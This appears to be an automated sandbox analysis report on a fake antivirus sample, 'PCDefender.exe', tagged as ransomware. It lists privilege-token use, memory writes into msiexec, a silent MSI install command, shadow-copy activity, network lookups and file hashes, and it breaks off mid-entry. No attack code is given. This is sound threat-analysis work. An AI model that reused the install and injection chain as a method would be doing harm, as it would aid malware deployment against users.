N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 4372 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe C:\Windows\SysWOW64\msiexec.exe
PID 2856 wrote to memory of 1468 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2856 wrote to memory of 1468 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2856 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2856 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2856 wrote to memory of 1220 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4212 wrote to memory of 3724 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 3724 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 920 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 3804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 3804 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4212 wrote to memory of 5024 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding EDB8E2C4D105E8B14E8F9980575AC7AF E Global\MSI0000

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaa8489758,0x7ffaa8489768,0x7ffaa8489778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3028 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4528 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5108 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1916,i,17749516175133300583,9419090901374229005,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi

MD5 7f728acab22868ca02cc1ba0a14f5d64
SHA1 9e3e82b152447b8bcd27583fbdab7aa91ca4739d
SHA256 586f9a9af50b2a3321e77d2b4583741cc4842967af9429cc371534f7179caec4
SHA512 9bc8bb97e6d4f18ec484fcd792466cb5df0bf0447cbaa19a41258ef80e599e8a2b2c83c700f32f30bef578b03614af1b554844d051435dc9f510ccbd56686800

C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe

MD5 b84df77564555c63c899fce0fcec7edb
SHA1 e63e7560b3c583616102cad58b06433b1a9903b0
SHA256 912ebab4ab2ea830b961df778dd854e555c89e05e25b7c02b3737429115405f9
SHA512 857717981c44a6a5fbb1bd34308e981c448746e0ea2d5bea94516fea20d0186e00a3547ad0b948c10fd9493e3ca00c0899927b0fa51c240697faacbbecca033a

C:\Config.Msi\e5811e0.rbs

MD5 c94dabdd1e33f0a09652fa6bc7bfc184
SHA1 b48183e017fc43e4abe2d999fd6ca9ccecccc66e
SHA256 4b96540bbad8a7acca851013b6f35a5cb7ec3120c6ca5b9f3fd1e2fff5a68d5d
SHA512 b6a3f2d4ab933255a19054974398825cfb217d6b160e976730333e854b58c415e8f2f5e525e65fcac433adf93e2e848f1557d82d6b5eeb771a70bbbe5c6e7db4

\??\Volume{ef7552f8-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f2fc0da7-0319-4d25-a2d3-2d4826c35753}_OnDiskSnapshotProp

MD5 4938c71bd8c2422235e1fe2027f16d65
SHA1 ee894facb01f9cd1d0764bc8bf4ac16c4ccd525e
SHA256 0c36e793a2adf0d69a57705bfdf96c3ed1c31d71fcce2f558fb5e2284b1e416c
SHA512 850db522ee1af1885815fec4eb67dc9bf7815314ab36eae4a6f6bee0535e1b75fd6924b0e574ea2b34906d78020c612d48091f06231a5253094ac0365009ff45

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 6ef1fc6b1984c9bcd4ddf002e09be3d7
SHA1 05d0364bfc7d50d4d76ddf517156ecf1b1517125
SHA256 5c5d5a681e552e8b003e8ec2711bd7ffec5c923bd529d7c8a16f7f440dd4a113
SHA512 2ebfa5218479ea34f23c7fde15f86bf8447ebc798490d1b0029931c0f55c717119f5a8c47a6141a7c090f897cb45720f7910afb0e8e4b48f1513284d0739760f

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4b21c844fe63940cc4dc14c66f92416f
SHA1 c08525bbfec0f1b168ea9d4f61b476e3d824308d
SHA256 2b3264da95ba92c2cdafb5badcfc02f94db79953a008e08a8b659a8f9a65ea51
SHA512 96adebf75b6af07e16881284374d0057bc6ebf0d605e866cc249493bd5b0f5a88c5a8b887d40e0bceb32ebb8a0a0e283b33ee7c5740ff59ef2f6043fcdcbfb51

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3fb10993e95dad2c3ec354cea001108b
SHA1 da42344fa918b69bbf488736bbb0dbc840098e4d
SHA256 7e204a42441eb6c3f9f494acae2bcbbfc7bc474b799951471bc3b909c8d279f4
SHA512 481c052abe31b61f1c48d8db91777ff6d55d4c749c543b8705aed0f35d92ac9a78d8f5c2bf5339812dfba25578c06b16eaa53db2b2757154bb87514b8fca4f65

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b1339764e026ac9bdb7e673a0d2fb17a
SHA1 17bb45545722f681e29bb0542e03e8b9f4f41465
